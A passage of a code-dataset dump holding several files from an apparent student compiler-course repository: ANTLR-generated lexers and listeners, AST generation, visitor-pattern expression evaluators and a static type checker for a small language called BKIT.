ParseTreeListener {\n\t/**\n\t * Enter a parse tree produced by {@link Question3Parser#program}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterProgram(Question3Parser.ProgramContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link Question3Parser#program}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitProgram(Question3Parser.ProgramContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link Question3Parser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterNumber(Question3Parser.NumberContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link Question3Parser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitNumber(Question3Parser.NumberContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link Question3Parser#string}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterString(Question3Parser.StringContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link Question3Parser#string}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitString(Question3Parser.StringContext ctx);\n}" }, { "alpha_fraction": 0.5298726558685303, "alphanum_fraction": 0.5377081036567688, "avg_line_length": 22.482759475708008, "blob_id": "6001faa56654a7583d0102ab1e10f70dad2e6dcf", "content_id": "98a2390f77d8c4f04bff0f0d2cb3d659270b1997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "no_license", "max_line_length": 97, "num_lines": 87, "path": "/OOP/programmingCode/Question1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Exp:\n def accept(self, func):\n pass\n\nclass IntLit(Exp):\n def __init__(self, _val):\n self.val = int(_val)\n \n def eval(self):\n return self.val\n\n def printPrefix(self):\n return str(self.val)\n \n def printPostfix(self):\n return str(self.val)\n\n\nclass FloatLit(Exp):\n def __init__(self, _num):\n self.val = float(_num)\n\n def eval(self):\n return self.val\n\n def printPrefix(self):\n return 
str(self.val)\n\n def printPostfix(self):\n return str(self.val)\n\nclass UnExp(Exp):\n def __init__(self, _op, _arg):\n self.operator = _op\n self.arg = _arg\n \n def eval(self):\n if self.operator == '+':\n return self.eval()\n \n if self.operator == '-':\n return 0 - self.arg.eval()\n \n def printPrefix(self):\n return self.operator + '.' + ' ' + self.arg.printPrefix()\n\n def printPostfix(self):\n return self.arg.printPostfix() + \" .\" + self.operator\n \n\nclass BinExp(Exp):\n def __init__(self, _left, _op, _right):\n self.operator = _op\n self.left = _left\n self.right = _right\n\n def eval(self):\n if self.operator == '+':\n return self.left.eval() + self.right.eval()\n \n if self.operator == '-':\n return self.left.eval() - self.right.eval()\n\n if self.operator == '*':\n return self.left.eval() * self.right.eval()\n\n if self.operator == '/':\n return self.left.eval() / self.right.eval()\n else:\n return None\n\n def printPrefix(self):\n return self.operator + ' ' + self.left.printPrefix() + ' ' + self.right.printPrefix()\n\n# class PrintPostfix():\n \n# def printPostfix(self):\n# return self.left.printPostfix() + ' ' + self.right.printPostfix() + ' ' + self.operator\n\nx0 = IntLit(1)\nx1 = UnExp(\"+\", x0)\nx2 = IntLit(1)\nx3 = IntLit(2)\nx4 = BinExp(x2, \"*\", x3)\nprint(x4.printPrefix())\n# print(x5.printPostfix())\n# print(x5.accept(x5.printPostfix))" }, { "alpha_fraction": 0.3322923183441162, "alphanum_fraction": 0.5249843597412109, "avg_line_length": 41.66666793823242, "blob_id": "68f8960b9c98ef64229127904bf39aae2f942e61", "content_id": "527f9ee13854d3f28ca9839eef3d8a29bf7624a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3202, "license_type": "no_license", "max_line_length": 113, "num_lines": 75, "path": "/AST/assignment2/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from 
/home/nguyendat/Documents/projects/PPL/AST/assignment2/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\n\")\n buf.write(\"I\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\3\\2\\3\\2\\3\\3\\3\\3\\3\\4\\6\\4\\31\\n\\4\\r\\4\\16\")\n buf.write(\"\\4\\32\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\5\\5&\\n\\5\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\5\\6-\\n\\6\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\")\n buf.write(\"\\3\\7\\3\\7\\3\\7\\5\\79\\n\\7\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\\3\\b\")\n buf.write(\"\\5\\bC\\n\\b\\3\\t\\6\\tF\\n\\t\\r\\t\\16\\tG\\2\\2\\n\\3\\3\\5\\4\\7\\5\\t\\6\")\n buf.write(\"\\13\\7\\r\\b\\17\\t\\21\\n\\3\\2\\5\\3\\2\\62;\\4\\2>>@@\\3\\2c|\\2T\\2\\3\")\n buf.write(\"\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\")\n buf.write(\"\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\3\\23\\3\\2\\2\")\n buf.write(\"\\2\\5\\25\\3\\2\\2\\2\\7\\30\\3\\2\\2\\2\\t%\\3\\2\\2\\2\\13,\\3\\2\\2\\2\\r\")\n buf.write(\"8\\3\\2\\2\\2\\17B\\3\\2\\2\\2\\21E\\3\\2\\2\\2\\23\\24\\7*\\2\\2\\24\\4\\3\")\n buf.write(\"\\2\\2\\2\\25\\26\\7+\\2\\2\\26\\6\\3\\2\\2\\2\\27\\31\\t\\2\\2\\2\\30\\27\\3\")\n buf.write(\"\\2\\2\\2\\31\\32\\3\\2\\2\\2\\32\\30\\3\\2\\2\\2\\32\\33\\3\\2\\2\\2\\33\\b\")\n buf.write(\"\\3\\2\\2\\2\\34\\35\\7V\\2\\2\\35\\36\\7t\\2\\2\\36\\37\\7w\\2\\2\\37&\\7\")\n buf.write(\"g\\2\\2 !\\7H\\2\\2!\\\"\\7c\\2\\2\\\"#\\7n\\2\\2#$\\7u\\2\\2$&\\7g\\2\\2%\")\n buf.write(\"\\34\\3\\2\\2\\2% \\3\\2\\2\\2&\\n\\3\\2\\2\\2\\'(\\7c\\2\\2()\\7p\\2\\2)-\")\n buf.write(\"\\7f\\2\\2*+\\7q\\2\\2+-\\7t\\2\\2,\\'\\3\\2\\2\\2,*\\3\\2\\2\\2-\\f\\3\\2\")\n 
buf.write(\"\\2\\2./\\7-\\2\\2/9\\7?\\2\\2\\60\\61\\7/\\2\\2\\619\\7?\\2\\2\\62\\63\\7\")\n buf.write(\"(\\2\\2\\639\\7?\\2\\2\\64\\65\\7~\\2\\2\\659\\7?\\2\\2\\66\\67\\7<\\2\\2\")\n buf.write(\"\\679\\7?\\2\\28.\\3\\2\\2\\28\\60\\3\\2\\2\\28\\62\\3\\2\\2\\28\\64\\3\\2\")\n buf.write(\"\\2\\28\\66\\3\\2\\2\\29\\16\\3\\2\\2\\2:C\\7?\\2\\2;<\\7>\\2\\2<C\\7@\\2\")\n buf.write(\"\\2=>\\7@\\2\\2>C\\7?\\2\\2?@\\7>\\2\\2@C\\7?\\2\\2AC\\t\\3\\2\\2B:\\3\\2\")\n buf.write(\"\\2\\2B;\\3\\2\\2\\2B=\\3\\2\\2\\2B?\\3\\2\\2\\2BA\\3\\2\\2\\2C\\20\\3\\2\\2\")\n buf.write(\"\\2DF\\t\\4\\2\\2ED\\3\\2\\2\\2FG\\3\\2\\2\\2GE\\3\\2\\2\\2GH\\3\\2\\2\\2H\")\n buf.write(\"\\22\\3\\2\\2\\2\\t\\2\\32%,8BG\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n T__0 = 1\n T__1 = 2\n INTLIT = 3\n BOOLIT = 4\n ANDOR = 5\n ASSIGN = 6\n COMPARE = 7\n ID = 8\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'('\", \"')'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"INTLIT\", \"BOOLIT\", \"ANDOR\", \"ASSIGN\", \"COMPARE\", \"ID\" ]\n\n ruleNames = [ \"T__0\", \"T__1\", \"INTLIT\", \"BOOLIT\", \"ANDOR\", \"ASSIGN\", \n \"COMPARE\", \"ID\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n" }, { "alpha_fraction": 0.49857985973358154, "alphanum_fraction": 0.5077561736106873, "avg_line_length": 25.604650497436523, "blob_id": "33a3399ce33f2122fcb137825f647581c781d924", "content_id": "c21c0b8c20e4390ccc7acd6bdffb7ad47e2d7c75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 4577, "license_type": "no_license", "max_line_length": 99, "num_lines": 172, "path": "/type/Q3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from abc import ABC\nclass Program: pass #decl:List[VarDecl],stmts:List[Assign]\n\nclass VarDecl: pass #name:str\n\nclass Assign: pass#lhs:Id,rhs:Exp\n\nclass Exp(ABC): pass#abstract class\n\nclass BinOp(Exp): pass#op:str,e1:Exp,e2:Exp #op is +,-,*,/,+.,-.,*.,/., &&,||, >, >., >b, =, =., =b\n\nclass UnOp(Exp): pass#op:str,e:Exp #op is -,-., !,i2f, floor\n\nclass IntLit(Exp): pass#val:int\n\nclass FloatLit(Exp): pass#val:float\n\nclass BoolLit(Exp): pass#val:bool\n\nclass Id(Exp): pass#name:str\n\nclass TypeMismatchInExpression(Exception): pass\n\nclass TypeCannotBeInferred(Exception): pass\n\nclass TypeMismatchInStatement(Exception): pass\n\nclass UndeclaredIdentifier(Exception): pass\n\nclass Visitor():\n pass\n\nfrom functools import reduce\nclass StaticCheck(Visitor):\n\n def visitProgram(self,ctx:Program,o):\n list_decl = list(map(lambda x: self.visitVarDecl(x, o), ctx.decl))\n env = {'ctx': None}\n for d in list_decl:\n env.update(d)\n for stmt in ctx.stmts:\n self.visitAssign(stmt, env)\n\n def visitVarDecl(self,ctx:VarDecl,o):\n return {ctx.name: None}\n\n def visitAssign(self,ctx:Assign,o):\n o['ctx'] = None\n rhs = self.visit(ctx.rhs, o)\n o['ctx'] = None\n try:\n lhs = self.visit(ctx.lhs, o)\n except TypeCannotBeInferred as e:\n lhs = o[ctx.lhs.name]\n if type(lhs) == type(rhs):\n if lhs == None:\n raise TypeCannotBeInferred(ctx)\n else: return\n if lhs == None:\n o[ctx.lhs.name] = rhs\n return\n if isinstance(rhs, Id):\n rhs = lhs\n raise TypeMismatchInStatement(ctx)\n\n def visitBinOp(self,ctx:BinOp,o):\n if ctx.op in ['+', '-', '*', '/']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return IntLit(0)\n\n if ctx.op in ['+.', '-.', '*.', '/.']:\n o['ctx'] = 
FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['>', '=']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return BoolLit(0)\n\n if ctx.op in ['>.', '=.']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return BoolLit(0)\n\n if ctx.op in ['!','&&', '||', '>b', '=b']:\n o['ctx'] = BoolLit(0)\n a = self.visit(ctx.e1, o)\n\n o['ctx'] = BoolLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, BoolLit) and isinstance(b, BoolLit):\n return BoolLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitUnOp(self,ctx:UnOp,o):\n if ctx.op in ['-']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return IntLit(0)\n\n if ctx.op in ['-.']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['!']:\n o['ctx'] = BoolLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, BoolLit):\n return BoolLit(0)\n\n if ctx.op in ['i2f']:\n o['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return FloatLit(0)\n\n if ctx.op in ['floor']:\n o['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return IntLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitIntLit(self,ctx:IntLit,o):\n return IntLit(0)\n\n def visitFloatLit(self,ctx:FloatLit,o):\n return FloatLit(1.1)\n\n def visitBoolLit(self,ctx:BoolLit,o):\n return BoolLit(True)\n\n def visitId(self,ctx:Id,o):\n if ctx.name not in o:\n raise UndeclaredIdentifier(ctx.name)\n \n if o[ctx.name] == None:\n o[ctx.name] = o['ctx']\n return o[ctx.name]\n\n" }, { "alpha_fraction": 0.6105303764343262, 
"alphanum_fraction": 0.6109175086021423, "avg_line_length": 35.39436721801758, "blob_id": "33b411738c6b190df4e6e071760d6c3e397dddcc", "content_id": "95c6054aeae1c8faf32cefd5b9b729e20afa4c73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2583, "license_type": "no_license", "max_line_length": 96, "num_lines": 71, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return Program(self.visitVardecls(ctx.vardecls())) if ctx.vardecls() else None\n\n# def visitVardecls(self,ctx:MPParser.VardeclsContext):\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n\n# def visitVardecltail(self,ctx:MPParser.VardecltailContext): \n# if ctx.vardecl() and ctx.vardecltail():\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n# return []\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# var_type = self.visitMptype(ctx.mptype())\n# return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# if ctx.INTTYPE():\n# return IntType()\n# else:\n# return FloatType()\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# if ctx.ids():\n# return self.visitIds(ctx.ids()) + [Id(ctx.ID().getText())]\n# else:\n# if ctx.ID():\n# return [Id(ctx.ID().getText())]\n# else:\n# return []\n\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return Program(self.visitVardecls(ctx.vardecls())) if ctx.vardecls() else None\n\n def visitVardecls(self,ctx:BKITParser.VardeclsContext):\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n\n def 
visitVardecltail(self,ctx:BKITParser.VardecltailContext): \n if ctx.vardecl() and ctx.vardecltail():\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n return []\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext):\n if ctx.ids(): \n var_type = self.visitMptype(ctx.mptype())\n return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))[::-1]\n else:\n return []\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n if ctx.INTTYPE():\n return IntType()\n else:\n return FloatType() \n\n def visitIds(self,ctx:BKITParser.IdsContext):\n if ctx.ids():\n return self.visitIds(ctx.ids()) + [Id(ctx.ID().getText())]\n else:\n if ctx.ID():\n return [Id(ctx.ID().getText())]\n else:\n return []" }, { "alpha_fraction": 0.4605887830257416, "alphanum_fraction": 0.4743589758872986, "avg_line_length": 28.055171966552734, "blob_id": "fecd79ddf7c5181a20e473b5f008ce052e9b4e0e", "content_id": "278cfee7acb7faded9326ededa92f45d896cc57f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4212, "license_type": "no_license", "max_line_length": 71, "num_lines": 145, "path": "/type/test.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from functools import reduce\nclass StaticCheck(Visitor):\n\n def visitProgram(self,ctx:Program,o):\n env = dict({'ctx': None})\n reduce(lambda env, x: self.visitVarDecl(x, env), ctx.decl, env)\n for stmt in ctx.stmts:\n self.visit(stmt, [env])\n \n def visitBlock(self,ctx:Block,o):\n env = dict({'ctx': None})\n reduce(lambda env, x: self.visitVarDecl(x, env), ctx.decl, env)\n for stmt in ctx.stmts:\n self.visitAssign(stmt, [env]+o)\n\n def visitVarDecl(self,ctx:VarDecl,o):\n if ctx.name in o:\n raise Redeclared(ctx)\n o.update(dict({ctx.name: None}))\n\n def visitAssign(self,ctx:Assign,o):\n o[0]['ctx'] = None\n rhs = self.visit(ctx.rhs, o)\n o[0]['ctx'] = None\n lhs = self.visit(ctx.lhs, o)\n if type(lhs) == type(rhs):\n if 
lhs == None:\n raise TypeCannotBeInferred(ctx)\n else:\n return\n if lhs == None:\n o[0][ctx.lhs.name] = rhs\n return\n if isinstance(ctx.rhs, Id) and rhs == None:\n o[0][ctx.rhs.name] = lhs\n return\n raise TypeMismatchInStatement(ctx)\n\n def visitBinOp(self,ctx:BinOp,o):\n if ctx.op in ['+', '-', '*', '/']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return IntLit(0)\n\n if ctx.op in ['+.', '-.', '*.', '/.']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['>', '=']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = IntLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, IntLit) and isinstance(b, IntLit):\n return BoolLit(0)\n\n if ctx.op in ['>.', '=.']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = FloatLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, FloatLit) and isinstance(b, FloatLit):\n return BoolLit(0)\n\n if ctx.op in ['!','&&', '||', '>b', '=b']:\n o[0]['ctx'] = BoolLit(0)\n a = self.visit(ctx.e1, o)\n\n o[0]['ctx'] = BoolLit(0)\n b = self.visit(ctx.e2, o)\n\n if isinstance(a, BoolLit) and isinstance(b, BoolLit):\n return BoolLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitUnOp(self,ctx:UnOp,o):\n if ctx.op in ['-']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return IntLit(0)\n\n if ctx.op in ['-.']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return FloatLit(0)\n\n if ctx.op in ['!']:\n o[0]['ctx'] = BoolLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, BoolLit):\n return BoolLit(0)\n\n if ctx.op in ['i2f']:\n o[0]['ctx'] = IntLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, IntLit):\n return 
FloatLit(0)\n\n if ctx.op in ['floor']:\n o[0]['ctx'] = FloatLit(0)\n a = self.visit(ctx.e, o)\n\n if isinstance(a, FloatLit):\n return IntLit(0)\n\n raise TypeMismatchInExpression(ctx)\n\n def visitIntLit(self,ctx:IntLit,o):\n return IntLit(0)\n\n def visitFloatLit(self,ctx:FloatLit,o):\n return FloatLit(1.1)\n\n def visitBoolLit(self,ctx:BoolLit,o):\n return BoolLit(True)\n\n def visitId(self,ctx:Id,o):\n for scope in o:\n if ctx.name in scope:\n if scope[ctx.name] == None:\n scope[ctx.name] = scope['ctx']\n return scope[ctx.name]\n raise UndeclaredIdentifier(ctx.name)" }, { "alpha_fraction": 0.5179340243339539, "alphanum_fraction": 0.5329985618591309, "avg_line_length": 22.436975479125977, "blob_id": "688da6dd015ba1e90fbdea008b9234b94cea3db8", "content_id": "17e2477cc816370eb5322c7e9cd4eede37bbf8bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 93, "num_lines": 119, "path": "/OOP/programmingCode/Question2.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Exp:\n pass\n\nclass IntLit(Exp):\n def __init__(self, _val):\n self.val = int(_val)\n \n def accept(self, visitor):\n return visitor.intlit(self.val)\n\n\nclass FloatLit(Exp):\n def __init__(self, _num):\n self.val = float(_num)\n\n def accept(self, visitor):\n return visitor.floatlit(self.val)\n\nclass UnExp(Exp):\n def __init__(self, _op, _arg):\n self.operator = _op\n self.arg = _arg\n \n def accept(self, visitor):\n return visitor.unexp(self.operator, self.arg)\n\nclass BinExp(Exp):\n def __init__(self, _left, _op, _right):\n self.operator = _op\n self.left = _left\n self.right = _right\n\n def accept(self, visitor):\n return visitor.binexp(self.left, self.operator, self.right)\n\nclass Eval(Exp):\n def __init__(self):\n pass\n\n def intlit(self, x):\n return x\n\n def floatlit(self, x):\n return x\n\n def binexp(self, _left, _op, _right):\n\n if _op == '+':\n 
return _left.accept(Eval()) + _right.accept(Eval())\n elif _op == '-':\n return _left.accept(Eval()) - _right.accept(Eval())\n elif _op == '*':\n return _left.accept(Eval()) * _right.accept(Eval())\n elif _op == '/':\n return _left.accept(Eval()) / _right.accept(Eval())\n \n def unexp(self, _op, _arg):\n if _op == '+':\n return _arg.accept(Eval())\n elif _op == '-':\n return - _arg.accept(Eval())\n\nclass PrintPrefix():\n def __init__(self):\n pass\n\n def intlit(self, _val):\n return str(_val)\n\n def floatlit(self, _val):\n return str(_val)\n\n def binexp(self, _left, _op, _right):\n return _op + ' ' + _left.accept(PrintPrefix()) + ' ' + _right.accept(PrintPrefix())\n\n def unexp(self, _op, _arg):\n return _op + '.' + ' ' + _arg.accept(PrintPrefix())\n\nclass PrintPostfix():\n def __init__(self):\n pass\n\n def intlit(self, _val):\n return str(_val)\n\n def floatlit(self, _val):\n return str(_val)\n\n def binexp(self, _left, _op, _right):\n return _left.accept(PrintPostfix()) + ' ' + _right.accept(PrintPostfix()) + ' ' + _op\n\n def unexp(self, _op, _arg):\n return _arg.accept(PrintPostfix()) + ' ' + _op + '.'\n\n\nx1 = IntLit(3)\nx2 = IntLit(4)\nx3 = FloatLit(2.0)\n\nx4 = BinExp(x2, '*', x3)\nx5 = BinExp(x1, '+', x4)\nx6 = UnExp('-', x5)\n# -(3 + 4 * 2.0)\nx7 = BinExp(x5, '*', UnExp('-', x1))\n# 3 + 4 * 2.0 * -3\nx8 = BinExp(UnExp('-', x1), '*', x5)\n\nx9 = BinExp(x1, \"+\", x2)\n\n# print(x6.eval())\n# print(x6.printPrefix())\nprint(x9.accept(Eval()))\nprint(x7.accept(Eval()))\nprint(x7.accept(PrintPrefix()))\nprint(x7.accept(PrintPostfix()))\n\nprint(x8.accept(Eval()))\nprint(x8.accept(PrintPrefix()))\nprint(x8.accept(PrintPostfix()))" }, { "alpha_fraction": 0.298257052898407, "alphanum_fraction": 0.5620622038841248, "avg_line_length": 56.90565872192383, "blob_id": "c2e9dbe3ae8f2d2ce11ae349bb354961a196691a", "content_id": "dff8eab0ab5ab4dc89236ba639675cbde80dbc83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 12278, "license_type": "no_license", "max_line_length": 103, "num_lines": 212, "path": "/LexicalAnalysis/target/main/bkit/parser/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\21\")\n buf.write(\"\\u011d\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\3\\2\\6\\2O\\n\\2\\r\\2\\16\\2P\\3\\2\\7\\2T\\n\\2\\f\\2\\16\\2W\\13\")\n buf.write(\"\\2\\6\\2Y\\n\\2\\r\\2\\16\\2Z\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\")\n buf.write(\"\\3\\4\\5\\4f\\n\\4\\3\\5\\3\\5\\3\\5\\3\\5\\7\\5l\\n\\5\\f\\5\\16\\5o\\13\\5\")\n buf.write(\"\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\5\\tx\\n\\t\\3\\n\\3\\n\\3\\13\\3\\13\")\n buf.write(\"\\3\\13\\3\\f\\3\\f\\3\\f\\5\\f\\u0082\\n\\f\\3\\r\\3\\r\\3\\r\\6\\r\\u0087\")\n buf.write(\"\\n\\r\\r\\r\\16\\r\\u0088\\3\\16\\3\\16\\7\\16\\u008d\\n\\16\\f\\16\\16\")\n buf.write(\"\\16\\u0090\\13\\16\\3\\17\\6\\17\\u0093\\n\\17\\r\\17\\16\\17\\u0094\")\n buf.write(\"\\3\\17\\3\\17\\5\\17\\u0099\\n\\17\\3\\17\\5\\17\\u009c\\n\\17\\3\\20\\3\")\n buf.write(\"\\20\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\\23\\3\\24\\3\\24\\3\\25\\3\\25\")\n 
buf.write(\"\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\\3\\31\\3\\31\\3\\31\\3\\31\\3\\32\")\n buf.write(\"\\3\\32\\3\\32\\3\\32\\5\\32\\u00b8\\n\\32\\3\\32\\6\\32\\u00bb\\n\\32\\r\")\n buf.write(\"\\32\\16\\32\\u00bc\\3\\33\\6\\33\\u00c0\\n\\33\\r\\33\\16\\33\\u00c1\")\n buf.write(\"\\3\\34\\3\\34\\3\\34\\3\\34\\5\\34\\u00c8\\n\\34\\3\\34\\6\\34\\u00cb\\n\")\n buf.write(\"\\34\\r\\34\\16\\34\\u00cc\\3\\35\\3\\35\\5\\35\\u00d1\\n\\35\\3\\36\\3\")\n buf.write(\"\\36\\3\\36\\3\\36\\3\\36\\3\\36\\5\\36\\u00d9\\n\\36\\3\\37\\3\\37\\3\\37\")\n buf.write(\"\\3\\37\\5\\37\\u00df\\n\\37\\3 \\3 \\3 \\7 \\u00e4\\n \\f \\16 \\u00e7\")\n buf.write(\"\\13 \\3!\\3!\\7!\\u00eb\\n!\\f!\\16!\\u00ee\\13!\\3!\\3!\\3\\\"\\6\\\"\")\n buf.write(\"\\u00f3\\n\\\"\\r\\\"\\16\\\"\\u00f4\\3\\\"\\3\\\"\\3#\\3#\\7#\\u00fb\\n#\\f\")\n 